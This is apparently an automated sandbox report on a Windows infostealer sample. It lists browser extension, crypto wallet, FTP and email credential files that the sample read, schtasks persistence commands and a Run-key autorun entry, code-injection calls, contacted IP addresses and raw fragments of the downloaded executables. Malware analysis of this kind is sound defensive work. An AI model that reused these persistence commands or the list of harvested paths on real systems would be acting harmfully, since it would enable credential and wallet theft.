__exception__ Jan. 17, 2024, 8:07 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x754c374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x75c6f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x754d414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x75b3fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x75c6a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7532e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x753072ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x752fab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x752fea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x752f87f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x752fba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755f62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755f6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755f77c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x755f7bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7532516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x753250ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x752fa0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x752f9b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x752f9aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7532530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x753257a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x72a4540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x72a452ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72b20ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77907e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x778e54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7559b727 registers.esp: 69720024 registers.edi: 1974991376 registers.eax: 69720024 registers.ebp: 69720104 registers.edx: 1 registers.ebx: 5114356 registers.esi: 2147746133 registers.ecx: 3510243923	1	0	0
__exception__ Jan. 17, 2024, 7:59 a.m.	stacktrace: exception.symbol: exception.exception_code: 0xc0000005 exception.address: 0x0 registers.r14: 244904968 registers.r15: 83455680 registers.rcx: 1300 registers.rsi: 17302540 registers.r10: 0 registers.rbx: 244904224 registers.rsp: 244903928 registers.r11: 244907840 registers.r8: 2004779404 registers.r9: 0 registers.rdx: 1356 registers.r12: 244904584 registers.rbp: 244904080 registers.rdi: 85441600 registers.rax: 11075584 registers.r13: 83354272	1	0	0
__exception__ Jan. 17, 2024, 7:59 a.m.	stacktrace: 0xcd1f04 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 0x7fe00000030 exception.instruction_r: 83 3d 8d d1 02 00 00 ff 25 00 00 00 00 53 12 69 exception.instruction: cmp dword ptr [rip + 0x2d18d], 0 exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xcd1f04 registers.r14: 8974696 registers.r15: 8791380629104 registers.rcx: 48 registers.rsi: 8791380560768 registers.r10: 0 registers.rbx: 0 registers.rsp: 8974328 registers.r11: 8977712 registers.r8: 2004779404 registers.r9: 0 registers.rdx: 8796092883536 registers.r12: 14917056 registers.rbp: 8974448 registers.rdi: 205627424 registers.rax: 13442816 registers.r13: 8975288	1	0	0

Steals private information from local Internet browsers (50 out of 4045 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Sync Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\MEIPreload\Sync Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Sync Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Sync Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (5 events)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\Lzd-U--zeLf[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\xGzxHIbkRpC[1].js
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\0_HoU29ShlI[1].js
file	C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe

Creates a suspicious process (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\HMY7P2elTJeLWFuUrZFu.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4yn4sZHVEZHsgO\2hMM9txR1g67fgph3Nnz.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Jan. 17, 2024, 8:05 a.m.	thread_identifier: 2452 thread_handle: 0x000000f0 process_identifier: 2448 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000e8	1	1	0
CreateProcessInternalW Jan. 17, 2024, 8:05 a.m.	thread_identifier: 2564 thread_handle: 0x000000f8 process_identifier: 2560 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000f4	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (6 events)

Time & API	Arguments	Status	Return
Process32NextW Jan. 17, 2024, 8:05 a.m.	snapshot_handle: 0x00000440 process_name: pw.exe process_identifier: 772	1	1
Process32NextW Jan. 17, 2024, 8:05 a.m.	snapshot_handle: 0x00000440 process_name: taskhost.exe process_identifier: 1508	1	1
Process32NextW Jan. 17, 2024, 8:05 a.m.	snapshot_handle: 0x00000440 process_name: SearchFilterHost.exe process_identifier: 1984	1	1
Process32NextW Jan. 17, 2024, 8:05 a.m.	snapshot_handle: 0x00000440 process_name: svchost.exe process_identifier: 2252	1	1
Process32NextW Jan. 17, 2024, 8:05 a.m.	snapshot_handle: 0x00000440 process_name: cmd.exe process_identifier: 2484	1	1
Process32NextW Jan. 17, 2024, 8:05 a.m.	snapshot_handle: 0x00000440 process_name: conhost.exe process_identifier: 2500	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 17, 2024, 8:05 a.m.	process_identifier: 2912 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x05900000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process liva.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile Jan. 17, 2024, 8:05 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $wDþØ3%3%3%hM=%hM%hM %æH!%æH'%æHF%hM"%3%ã%¨K2%¨Ko2%¨K2%Rich3%PELlÖeà °Dú? @@@ P1<ð011<@à j@@àP@ ª@à´@àP <´@à.rsrcðð@àÐ)üø@à.data@Ð0@ô@àfZ²°æý QWxÊ¦Ú)R lêîû¹p¥ÿ}âSÞG&Ñqð'±³ ïG@èJàSe3,7}üF³¢ÄÓlæºÆð.ñÖæ,h :Óå4ÏF!æN{Kó)ø±ÓþÙ CÏl©¢ð)ÆYðØöOMËb"Uú¨£4mW{ÒïoÂÄ"e±Ä¶]Q¨AawðîæýñMùt¸·ý<Ru%®X¤ ?àY,rFyþÊèZ7$tNNzÂ¤ÅWëóXt»XÍÍPöê,3'Ü4~ïfr9Æ}bïéG½/yØ:øørzÑ£¬pÓdÍÎt4gÿ$FºuÐáwÊ %äï×ìK¡HgØR1¹¨? \|SC¹¢ÓPPhá¯3®CèéªIÌ¾>%}êÙì}.%C]N3J²ÿú,Y»êdÛ/÷æùO'¹'àOrÇ³ ä$Áè¥P±k)Jx¡ÌÙjµÜÌÉéß )òÏI%3üºÛ¸ÓjTu²x/õúµ3ø ¼;%õJ(Ú ÛÈ:ëá%Çö°ÇÙ4+zÏl<Ûº¶£úuSt0ñ×1z3Q£'5¬a)®÷aCqM²ÌÂÜmüïhÌïTHhÇ¡2ÒÛomÄ{¾ó$:¾É»\IÁlÁâ¾¿+Ù+ïÈâ¥qiùAïQº¨ÔO"¥;ò Ù·ÀC«Nóü>TwõyØvÀuáØN×àÊéÜÇçùnÀ 2;òààl\|,6A¬¨[½ØmåâÝB³ß§®½µ¦,a¤Ú©FG¼1&åYßâst¯ß5øê´KSTªû3%Â»zÈ8 ²9ÓgÓ@<]¹ñÛ§\|c3[ßB\|6['bþ0@4éÐvÿAJÔÐäÛ7Ö&^Ir®d1j£ Ä\ÒaoTÓ:R[eèGT¥üm±¾z ºw²îû¶å¹4!;ÐTVwYQÓ. äDÔüU+ÃÙî½Ô×Mîä°Ãþ âyû8·µÔ2kS·Y§ÅPXdQ<? DÏ6c-ÎW§Ý!ÀË+Õç0È©/ã)<KwÀ@Ãô¤ÍÍ½¥ï;]5iTÞ¡;¾±³¶û8r'êYÂÚD:KPv¸y çZâ+©ÃäCxåì·Zåø¤O°¼ªxm»ìÅã³% request_handle: 0x00cc000c	1	1	0
InternetReadFile Jan. 17, 2024, 8:05 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL&{§eà"¬ LwÀ @`ûÛ@@@d\|@ à uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1	0

Potentially malicious URLs were found in the process memory dump (3 events)

url	https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml
url	https://crash-reports.mozilla.com/submit?id=
url	https://hg.mozilla.org/releases/mozilla-release/rev/92187d03adde4b31daef292087a266f10121379c

Yara rule detected in process memory (26 events)

description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2832 CREDAT:145409
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Communicates with host for which no DNS query was performed (5 events)

host	109.107.182.3
host	117.18.232.200
host	185.215.113.68
host	193.233.132.62
host	23.67.53.17

Allocates execute permission to another process indicative of possible code injection (2 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 17, 2024, 7:58 a.m.	process_identifier: 2512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000077711000 process_handle: 0x0000000000000050	1	0	0
NtProtectVirtualMemory Jan. 17, 2024, 7:58 a.m.	process_identifier: 2512 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000776e7000 process_handle: 0x0000000000000050	1	0	0

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Potential code injection by writing to the memory of another process (9 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa722b0 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa80d88 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: I»`#¤?Aÿã base_address: 0x0000000077711590 process_identifier: 2512 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa80d78 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: I» ¤?Aÿã base_address: 0x00000000776e7a90 process_identifier: 2512 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa80d70 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: ÏT base_address: 0x000000013fa20108 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: qw@qw qw@qwqw°qw nwàTnw 3qwqwÀ´lw`,qwÀowömw Yqw2qwVqw°wwnwRqw nwQqwÂnw ?owPnw°TnwàtnwðowÐ1qwmwÐOmw`êpwÐæpwÐæpwÐ.qw base_address: 0x000000013fa7aae8 process_identifier: 2512 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Jan. 17, 2024, 7:58 a.m.	buffer: base_address: 0x000000013fa80c78 process_identifier: 2512 process_handle: 0x000000000000004c	1	1

Harvests credentials from local email clients (5 events)

file	C:\Users\test22\AppData\Roaming\ICQ\0001
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network activity contains more than one unique useragent (2 events)

process	liva.exe				useragent	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
process	iexplore.exe				useragent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

One or more non-whitelisted processes were created (4 events)

